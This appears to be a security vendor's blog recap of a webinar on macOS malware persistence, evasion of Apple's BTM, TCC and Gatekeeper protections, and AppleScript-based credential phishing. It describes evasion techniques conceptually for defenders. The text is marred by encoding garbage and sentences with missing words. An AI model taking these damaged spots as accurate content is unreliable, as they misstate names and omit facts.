Yes, Windows devices are still very much a business favorite鈥攂ut the adoption of macOS devices has been steadily ticking upward. Threat actors have noticed.聽
More macOS malware variants have cropped up over the years, ranging from frustrating adware (like Adload) to insidious spyware (like LightSpy). The LockBit ransomware group has even dabbled with .
Apple has taken several steps over the years to build security measures into its platform, including Gatekeeper and the Transparency Consent and Control (TCC) framework. These features help end users better manage access to their sensitive data and can help detect malware lurking on their systems鈥攂ut threat actors are also continually finetuning their attacks to get around them.聽
In our recent April Tradecraft Tuesday episode, Stuart Ashenbrenner, 杏吧传媒 macOS researcher (and our designated Mac Guy), and Patrick Wardle, founder of DoubleYou and Objective-See, to dig in to the security protections that Apple has employed for macOS, and how threat actors are responding to these measures by attempting to bypass them. Below are some of the key takeaways from the episode.聽
Malware authors continue to employ persistence mechanisms for macOS, but those techniques have sometimes changed over time, particularly in response to some of Apple鈥檚 built-in security features.聽
First, a quick primer on persistence: threat actors use various techniques to maintain persistent access on devices, even after they鈥檝e been rebooted. You may be aware of the persistence techniques used by malware targeting Windows devices鈥攂ut macOS and Windows devices use very different services and background processes. That means that instead of using Windows services or the registry for persistence, macOS malware will instead use different processes.聽
These have most typically been Launch Items in macOS, including Launch Daemons, which are property list files (plist) on various locations on the disk that are executed at the system level, and Launch Agents, which require a user session and execute specific binaries from plists.
For malware analysts and security researchers, persistence provides a good detection mechanism for malware, because unlike initial access vectors鈥攚hich vary widely from vulnerability exploitation to compromised credentials - there are a more limited number of persistence methods available.
Apple has specifically tracked persistent items in macOS through Background Task Management (BTM), which was introduced in 2022 and keeps tabs on persistence items in a BTM database. BTM creates macOS alerts for end users if it detects persistent items, and these are also broadcast as endpoint security events to third-party security tools.
At the same time, however, malware authors are aware of built-in Apple features like BTM. In response, they are looking for ways to either skirt around persistence detection mechanisms or to build their attacks around them. We can see one example of this through a recent increase of threat actors using cron jobs, which can be used on Linux and macOS systems to schedule commands. BTM doesn鈥檛 directly cover cron jobs if they are loaded in a certain way (via AdLoads), and we鈥檙e seeing a resurgence of legacy adware using cron jobs via AdLoads as a way of persistence.
We鈥檙e also seeing malware authors target apps or services that users regularly launch (such as replacing the Dock icon with their own malware). While this won鈥檛 automatically run on reboot (and therefore isn鈥檛 as consistent as something like a Launch Agent) it will still run if a user clicks on it, and because it isn鈥檛 governed by BTM it helps threat actors sidestep detection.
Threat actors in some cases are even shying away from using persistence if their attacks don鈥檛 necessarily need to use these types of techniques, which might be the case with certain infostealer or ransomware attacks.
TCC is Apple鈥檚 database on disk for prompting users when an application tries to perform an action that requires their specific permission. TCC is behind the prompts that ask users if video collaboration software can access their devices鈥 webcams or microphones, for example. After they give permission, the application is then given consent to carry out that action via system preferences.
TCC is a good idea from a security perspective, but its design and implementation has led to several UI impacts. End users are often inundated with security alerts tied to various permissions, even for security tools that have been signed with Developer IDs and notarized by Apple (meaning that they have gone through a process where Apple examined them closely to determine they鈥檙e not malware).聽
Another caveat of the TCC process鈥as we鈥檝e previously discussed鈥攊s related to mobile device management (MDM) overrides. MDM providers can provision TCC permissions, which means that end users don鈥檛 have to see all the TCC-related security prompts. However, these settings aren鈥檛 reflected in the System Settings and instead end up living in the MDM binary property list (MDMOverrides.plist) rather than a TCC database (TCC.db). This can cause discrepancies between what the MDM is showing end users versus what the endpoint is showing them.
There are also many ways for threat actors to get around TCC, as we鈥檝e seen through the many disclosures of macOS vulnerabilities in Apple鈥檚 security updates. XCSSET, which is macOS malware that was uncovered a few years ago and has various capabilities (from stealing victims鈥 app information to taking screenshots) was previously found exploiting CVE-2021-30713, a vulnerability allowing threat actors to bypass the TCC framework, for instance.
In Apple鈥檚 newest operating system release, to its endpoint security framework. Endpoint security is Apple鈥檚 process for monitoring system events for potentially malicious activity, released in macOS 10.15. The framework sends notification alerts after a new process has been spawned, but also delivers authorization event alerts before a process occurs (which allows security tools to inspect processes in case they want to prevent it).
As of macOS 15.4, endpoint security is now alerted of TCC prompts (via the ES_EVENT_TYPE_NOTIFY_TCC_MODIFY identifier), giving third-party security tools better visibility into TCC permissions that have been modified or changed. These events are currently reactive, meaning that notifications happen after they occur, but the more proactive authorization event functionality - which could allow security tools to inspect permissions before they鈥檙e granted - has not yet been built in.
Still, this development helps crack down on macOS malware that tries to bypass TCC through bombarding users with TCC prompts or masquerading as legitimate software. Previously, we鈥檝e seen malware authors play on the fact that end users can be tricked into granting permissions via TCC alerts (particularly if they鈥檙e inundated with so many alerts).
Apple has also made tweaks to Gatekeeper, its technology that double checks if apps contain known malware or whether developer signing certificates have been revoked. One previous issue impacting Gatekeeper was that macOS users could easily sidestep this security feature by right-clicking or through the 鈥淥pen Anyway鈥 option in System Settings in order to execute potentially malicious applications. Threat actors behind macOS malware like the Shlayer adware dropper have used this weakness in their attacks.
However, more recently Apple has tweaked Gatekeeper鈥檚 functionality, so if macOS users download a piece of software that鈥檚 not signed, they are warned that Apple can鈥檛 verify that it鈥檚 free of malware and are only given two options if they either attempt to right-click or visit System Settings: a 鈥淒one鈥 option to do nothing or a 鈥淢ove to Trash鈥 option.
These examples show Apple鈥檚 ongoing attempts to improve its security features in order to make them more difficult for threat actors to bypass in attacks.
Generally, as technology becomes more prolific, threat actors take notice of that鈥攁nd we鈥檙e seeing that with macOS as Macs become more common in the enterprise. While macOS malware has seemed to dramatically increase year-over-over, tracking specific numbers that point to this growth is difficult, especially because as researchers write new detections, we inherently start to see more.聽
However, we do see some overarching trends that are indicative of how more threat actors are targeting macOS platforms overall. For example, threat actors in some cases are porting their malware that鈥檚 been targeted for Windows or Linux platforms to macOS (either via cross-platform frameworks or by rewriting the malware natively for macOS).
We鈥檙e also seeing a rise in living-off-the-land techniques specifically focused on macOS. Infostealers like Poseidon are abusing the AppleScript framework鈥攁 scripting language that offers the capability to automate tasks鈥攖o simulate prompts that mimic native Apple prompts, with the goal of stealing end user credentials.聽
At the end of the day, threat actors continue to look for new ways to target macOS platforms and skirt around Apple鈥檚 built-in security protections. There are many ways to secure your Mac, like using third-party tools and keeping your OS and applications up to date.聽
For more details about macOS malware trends and to better understand the impacts of Apple鈥檚 new TCC events support in endpoint security,聽 watch the full version of our April Tradecraft Tuesday episode!
Get insider access to 杏吧传媒 tradecraft, killer events, and the freshest blog updates.
